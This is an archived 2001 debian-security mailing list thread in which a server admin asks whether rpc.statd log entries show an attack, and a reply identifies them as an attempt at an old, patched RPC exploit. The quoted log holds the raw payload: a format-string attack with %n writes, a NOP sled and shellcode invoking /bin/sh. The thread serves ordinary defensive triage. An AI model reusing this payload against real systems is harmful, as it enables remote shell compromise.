Re: Is this an attack ?

To: debian-security@lists.debian.org
Cc: Eric.VanBuggenhaut@AdValvas.be
Subject: Re: Is this an attack ?
From: Eric Van Buggenhaut <ericvb@debian.org>
Date: Tue, 26 Jun 2001 14:29:50 +0200
Message-id: <[🔎] 20010626142950.A488@femto.eric.ath.cx>
Reply-to: Eric.VanBuggenhaut@AdValvas.be
In-reply-to: <20010625211555.A3531@UnderGrid.net>
References: <20010625211555.A3531@UnderGrid.net>

Thanks for your answers.

On Mon, Jun 25, 2001 at 09:15:55PM -0700, Jeremy T. Bouse wrote:
> Eric,
> 
> 	Yes it's a poor attempt to make use of an old RPC exploit that
> has since been fix'd... I would check the rest of the logs for any other
> exploit attempts otherwise this was most likely unsuccessful since you 
> caught the log message.
> 
> 	Respectfully,
> 	Jeremy T. Bouse, CCNA
> 
> Eric Van Buggenhaut was said to been seen saying:
> > I've had someone persistently harrasing my server but i'm not a security guru.
> > Here's the log
> > 
> > 
> > Jun 26 01:47:17 yocto /sbin/rpc.statd[167]: gethostbyname error for
> > ^X???^X???^Y???^Y???^Z???^Z???^[???^[???%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> > Jun 26 01:47:17 yocto ?^F/bin?F^D/shA0A\210F^G\211v^L\215V^P\215N^L\211??^KI\200?^AI\200?\177???
> > Jun 26 02:06:54 yocto -- MARK --
> > 
> > 
> > Should I worry about this ?
> > 
> > 
> > Any hint welcomme.
> > 
> > 
> > -- 
> > Eric VAN BUGGENHAUT
> > 
> > Eric.VanBuggenhaut@AdValvas.be
> > 
> > 
> > -- 
> > Please respect the privacy of this mailing list.
> > 
> > To UNSUBSCRIBE, email to debian-private-request@lists.debian.org
> > with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
> 
> -- 
> ,-----------------------------------------------------------------------------,
> |Jeremy T. Bouse, CCNA - UnderGrid Network Services, LLC -  www.UnderGrid.net |
> |       Public PGP/GPG key available through http://wwwkeys.us.pgp.net        |
> |     If received unsigned (without requesting as such) DO NOT trust it!      |
> | jbouse@Debian.org   -   NIC Whois: JB5713   -   Jeremy.Bouse@UnderGrid.net  |
> `-----------------------------------------------------------------------------'



-- 
Eric VAN BUGGENHAUT

Eric.VanBuggenhaut@AdValvas.be

Reply to:

Prev by Date: Re: Compiling HostSentry
Next by Date: Re: Compiling Hostsentry
Previous by thread: Re: ProFtpd question
Next by thread: Re: Pam 0.72-26 critically broken
Index(es):
- Date
- Thread